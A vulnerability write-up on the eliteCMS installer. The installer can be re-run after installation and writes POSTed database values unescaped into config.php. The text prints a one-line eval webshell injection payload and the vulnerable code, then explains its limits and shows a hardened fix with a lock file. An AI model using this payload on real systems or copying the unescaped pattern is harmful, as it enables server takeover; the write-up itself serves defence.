eliteCMS's installer is not locked once installation finishes, so an attacker can re-run the installation simply by visiting the installer URL.

Another vulnerability: the installer can be made to write a one-line PHP webshell straight into admin/includes/config.php.

Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // Session values are interpolated verbatim into PHP source.
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "    die(\"Database connection failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "    die(\"Database select failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...
Now look at the code that sets those session values:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are taken without any validation. If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

the generated line becomes define("DB_NAME", ""?><?php eval($_POST[c]);?><?php"); and the one-line backdoor is written into /admin/includes/config.php.

Two things to check before relying on this. PHP compiles the whole of config.php before running any of it, and with this value the define() call is still open when ?> switches PHP off, so the file produces a parse error and the eval() never runs unless the injected value also closes the define() before ?> and leaves valid code after the trailing <?php. And if magic_quotes_gpc is on, the leading " arrives as \" and the entire payload stays inside the string literal. Either way the root causes are the same: the installer stays reachable after installation, and request data is spliced into PHP source without validation or escaping.
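As an added example that is not part of the original post or of eliteCMS, the script below reproduces the installer's pattern for one define() line and uses token_get_all() to show that the line built from the payload above leaves PHP mode, while a hardened generator (whitelist plus var_export()) cannot. It also shows the lock-file guard the installer is missing. The function names, the whitelist and the lock-file path are assumptions made for this illustration.

```php
<?php
// Added example, not eliteCMS code. Function names, the whitelist and the
// lock-file path are assumptions made for this illustration.

// The installer's pattern: the value lands unescaped inside a PHP source line.
function vulnerable_define(string $name, string $value): string
{
    return "define(\"{$name}\", \"{$value}\");\n";
}

// Hardened variant: reject anything outside a tight whitelist, then emit the
// value with var_export() so it can only ever be a PHP string literal.
function hardened_define(string $name, string $value): string
{
    // Host, database and user names: letters, digits, '_', '.', '-' and ':'
    // (host:port). A password should skip the whitelist and rely on var_export().
    if (!preg_match('/^[A-Za-z0-9_.:\-]{1,64}$/', $value)) {
        throw new InvalidArgumentException("Rejected value for {$name}");
    }
    return 'define(' . var_export($name, true) . ', '
         . var_export($value, true) . ");\n";
}

// True if the generated source ever leaves PHP mode. A define() built from a
// single string literal must never yield a T_CLOSE_TAG token.
function leaves_php_mode(string $phpSource): bool
{
    foreach (token_get_all($phpSource) as $tok) {
        if (is_array($tok) && $tok[0] === T_CLOSE_TAG) {
            return true;
        }
    }
    return false;
}

// The guard the installer lacks: refuse to run when a lock file exists, and
// drop the lock file as the last act of the final step.
function installer_locked(string $lockFile): bool
{
    return file_exists($lockFile);
}

function finish_install(string $lockFile): void
{
    file_put_contents($lockFile, "installed " . date('c') . "\n", LOCK_EX);
}

// Constructed input: the DB_NAME value from the post above.
$payload = '"?><?php eval($_POST[c]);?><?php';

$bad = "<?php\n" . vulnerable_define('DB_NAME', $payload);
echo $bad;
var_dump(leaves_php_mode($bad));

try {
    hardened_define('DB_NAME', $payload);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
$good = "<?php\n" . hardened_define('DB_NAME', 'elitecms');
echo $good;
var_dump(leaves_php_mode($good));

// Lock-file demo in the temp directory; a real installer would use its own
// directory and check installer_locked() before serving any step.
$lock = sys_get_temp_dir() . '/elitecms-install.lock';
@unlink($lock);
var_dump(installer_locked($lock));
finish_install($lock);
var_dump(installer_locked($lock));
```

Run it with php on the command line. leaves_php_mode() returns true for the installer-style line and false for the hardened one, hardened_define() throws on the payload, and the lock file flips installer_locked() from false to true, which is the check the installer should make before running any step. The whitelist is deliberately narrow; if a deployment needs other characters in a host name, widen the character class rather than dropping the var_export() quoting.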